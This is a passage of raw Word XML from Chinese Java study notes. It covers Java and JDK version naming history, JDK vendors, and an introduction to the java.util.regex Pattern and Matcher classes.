        <w:t>（此前原型为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1995</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>商标已被占用后改名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），此后为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J2SE1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J2SE1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J2SE1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命名方式，直到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaOne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会议后版本数提升为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这一新版本为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J2SE5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此处存在疑问，网上使用较多为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2006</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公司终结了已经有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年历史的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J2SE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J2EE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J2ME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命名方式启用了今天的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java SE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java EE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Java ME  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命名方式，而此后的版本为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361299F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A97E1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java1.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应每一个版本号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK1.2 ... JDK1.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK1.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应名称为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B57C8CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4D05DB41" wp14:editId="74B937D5">
            <wp:extent cx="3787140" cy="2655570"/>
            <wp:effectExtent l="0" t="0" r="7620" b="11430"/>
            <wp:docPr id="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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId220"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3787140" cy="2655570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BEFEAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073CDEAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05448EBD" w14:textId="77777777" w:rsidR="00732925" w:rsidRDefault="00732925" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除此以外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发行还分不同厂商，参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45379D04" w14:textId="5A338365" w:rsidR="004C452C" w:rsidRDefault="00732925" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00732925">
        <w:t>https://blog.csdn.net/wanghao72214/article/details/109993896</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F7A33" w14:textId="3224A25B" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427551A7" w14:textId="3BDA34DA" w:rsidR="00732925" w:rsidRDefault="00732925" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大概就是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最初写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，后来被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收购。开源的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，闭源的叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>维护的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDBD42" w14:textId="7A6CBA74" w:rsidR="00732925" w:rsidRPr="00732925" w:rsidRDefault="00732925" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>除此之外还有</w:t>
      </w:r>
      <w:r w:rsidRPr="00732925">
        <w:t>AdoptOpenJDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者是阿里，华为自己开发的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F9E89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="725" w:name="_Toc159780154"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置包和第三方包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="725"/>
    </w:p>
    <w:p w14:paraId="2181EDD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="726" w:name="_Toc159780155"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java.util.regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：正则表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="726"/>
    </w:p>
    <w:p w14:paraId="108D8701" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2080F28E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象是一个正则表达式的编译表示。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类没有公共构造方法。要创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，你必须首先调用其公共静态编译方法，它返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。该方法接受一个正则表达式作为它的第一个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE5E61D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B9A6AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383C00E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Matcher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB97C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Matcher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象是对输入字符串进行解释和匹配操作的引擎。与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类一样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Matcher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也没有公共构造方法。你需要调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> matcher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来获得一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Matcher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF987EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E06D95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一个动态的正则匹配，需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>find()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的返回的布尔值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来继续找下一个正则匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD8C8EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0A668" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引方法提供了有用的索引值，精确表明输入字符串中在哪能找到匹配：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C9EBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0303B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public int start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB266E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>返回以前匹配的初始索引。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3022D3E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public int start(int group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43284E43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>返回在以前的匹配操作期间，由给定组所捕获的子序列的初始索引</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F3827" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ublic int end()</w:t>
      </w:r>
    </w:p>
